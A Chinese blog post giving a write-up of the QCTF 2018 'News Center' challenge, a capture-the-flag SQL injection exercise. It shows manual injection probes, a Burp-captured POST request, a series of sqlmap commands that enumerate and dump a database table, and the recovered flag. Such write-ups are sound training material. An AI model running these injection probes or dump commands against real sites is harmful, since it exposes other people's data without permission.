banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel

QCTF-2018-新闻中心-解题报告

  • 为什么要写已经结束很久的题的 writeup:因为在做某 CTF 训练平台的题

首先打开网站,是一个搜索界面,随便搜索下,好像没什么反应:

image

试试有没有注入:

  • a':空白界面
  • a and 1=1:没返回内容
  • a and 1=1 and '%'='%:没返回内容

好像没啥可注入的,那看下包吧,上 burp,发现是 post 发包:

image

那么存为 1.txt,用 sqlmap 跑:
python sqlmap.py -r 1.txt -p search --dbs

image

python sqlmap.py -r 1.txt -p search -D news --tables

image

python sqlmap.py -r 1.txt -p search -D news -T secret_table --columns

image

python sqlmap.py -r 1.txt -p search -D news -T secret_table -C "fl4g,id" --dump

image

得到 flag:QCTF{sq1_inJec7ion_ezzz}

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。